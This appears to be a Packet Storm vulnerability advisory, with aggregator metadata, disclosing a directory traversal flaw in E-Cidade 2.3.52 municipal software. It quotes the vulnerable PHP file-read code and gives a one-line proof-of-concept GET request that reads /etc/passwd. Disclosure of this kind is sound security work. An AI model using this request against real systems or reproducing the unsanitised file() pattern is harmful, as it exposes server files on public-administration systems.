Search...

E-Cidade 2.3.52 Directory Traversal

2016-08-26T00:00:00

ID PACKETSTORM:138514
Type packetstorm
Reporter vesp3r
Modified 2016-08-26T00:00:00

Description

                                        
                                            `E-cidade Directory Traversal   
Vendor: DBSeller (www.dbseller.com.br)  
Product: E-cidade - Software Publico de Gestao Municipal  
Vulnerability discovered by vesp3r - vesp3r7c3@gmail.com   
  
  
Product Description  
--------------------  
  
Intended to computerize the management of Brazilian Municipalities.This includes computerized integration   
between municipal entities: City Hall, Town Hall, Local Government, Foundations and others.  
The economy of resources is only one of the advantages in the adoption of e-cidade and the freedom of choice   
of suppliers and ensuring continuity of the system, once supported by the Ministry of Planning.  
  
Modules:  
  
- HUMAN RESOURCES MANAGEMENT  
- GEOPROCESSING  
- HEALTH MANAGEMENT EDUCATION MANAGEMENT  
- BUSINESS INTELIGENCE  
- FINANCIAL MANAGEMENT  
- TAX MANAGEMENT  
- ASSET MANAGEMENT  
  
Advisory Timeline  
-----------------  
  
No vendor response  
  
  
Vulnerable version:  
-------------------  
  
2.3.52 and prior   
  
Vulnerability  
-------------  
  
The vulnerability exists within 'mostrarelatorio.php' file of the package:  
the 'arquivo' variable is requested via GET method. It is passed as a variable to another variable called 'arq'.   
This variable incorporates a call to the file() function.  
  
/fpdf151/mostrarelatorio.php:  
-----------------------------  
  
[Snip...]  
  
  
if(!file_exists("/tmp/".$arquivo)) {  
echo "&lt;script&gt;   
alert('Codigo nao Encontrado.');  
window.close();  
&lt;/script&gt;";  
exit;  
}  
  
[Snip...]  
  
$pdf=new PDF();  
$pdf-&gt;Open();  
$pdf-&gt;AliasNbPages();  
$pdf-&gt;AddPage();  
$arq = file("/tmp/".$arquivo);  
  
  
[Snip...]  
  
  
  
Proof of Concept  
---------------  
  
GET /e-cidade/fpdf151/mostrarelatorio.php?arquivo=./../../../../../../etc/passwd HTTP/1.1  
`

JSON Vulners Source

Initial Source

{"hash": "7ff11a5ad9592bb46fac91f56f66fc13bc221b8338b78f50fb7a2896cf1e7cde", "sourceHref": "https://packetstormsecurity.com/files/download/138514/ecidade2352-traversal.txt", "title": "E-Cidade 2.3.52 Directory Traversal", "id": "PACKETSTORM:138514", "published": "2016-08-26T00:00:00", "description": "", "modified": "2016-08-26T00:00:00", "sourceData": "`E-cidade Directory Traversal \nVendor: DBSeller (www.dbseller.com.br) \nProduct: E-cidade - Software Publico de Gestao Municipal \nVulnerability discovered by vesp3r - vesp3r7c3@gmail.com \n \n \nProduct Description \n-------------------- \n \nIntended to computerize the management of Brazilian Municipalities.This includes computerized integration \nbetween municipal entities: City Hall, Town Hall, Local Government, Foundations and others. \nThe economy of resources is only one of the advantages in the adoption of e-cidade and the freedom of choice \nof suppliers and ensuring continuity of the system, once supported by the Ministry of Planning. \n \nModules: \n \n- HUMAN RESOURCES MANAGEMENT \n- GEOPROCESSING \n- HEALTH MANAGEMENT EDUCATION MANAGEMENT \n- BUSINESS INTELIGENCE \n- FINANCIAL MANAGEMENT \n- TAX MANAGEMENT \n- ASSET MANAGEMENT \n \nAdvisory Timeline \n----------------- \n \nNo vendor response \n \n \nVulnerable version: \n------------------- \n \n2.3.52 and prior \n \nVulnerability \n------------- \n \nThe vulnerability exists within 'mostrarelatorio.php' file of the package: \nthe 'arquivo' variable is requested via GET method. It is passed as a variable to another variable called 'arq'. \nThis variable incorporates a call to the file() function. \n \n/fpdf151/mostrarelatorio.php: \n----------------------------- \n \n[Snip...] \n \n \nif(!file_exists(\"/tmp/\".$arquivo)) { \necho \"<script> \nalert('Codigo nao Encontrado.'); \nwindow.close(); \n</script>\"; \nexit; \n} \n \n[Snip...] \n \n$pdf=new PDF(); \n$pdf->Open(); \n$pdf->AliasNbPages(); \n$pdf->AddPage(); \n$arq = file(\"/tmp/\".$arquivo); \n \n \n[Snip...] \n \n \n \nProof of Concept \n--------------- \n \nGET /e-cidade/fpdf151/mostrarelatorio.php?arquivo=./../../../../../../etc/passwd HTTP/1.1 \n`\n", "reporter": "vesp3r", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "52954f1093657f3313d1c50e8d309d81"}, {"key": "modified", "hash": "4ef38881c143abc958fb81f5f52eaf21"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "4ef38881c143abc958fb81f5f52eaf21"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "bab05830c1048ee58d5530d328e182dd"}, {"key": "sourceData", "hash": "2af33438eae3c72f83d1a369e3b69a27"}, {"key": "sourceHref", "hash": "bfbb569c67a331c49bf11515bafe2e02"}, {"key": "title", "hash": "05d1f357dd70be4cbd7960732a844bc7"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/138514/E-Cidade-2.3.52-Directory-Traversal.html", "lastseen": "2016-11-03T10:16:14", "viewCount": 0, "enchantments": {"vulnersScore": 8.3}}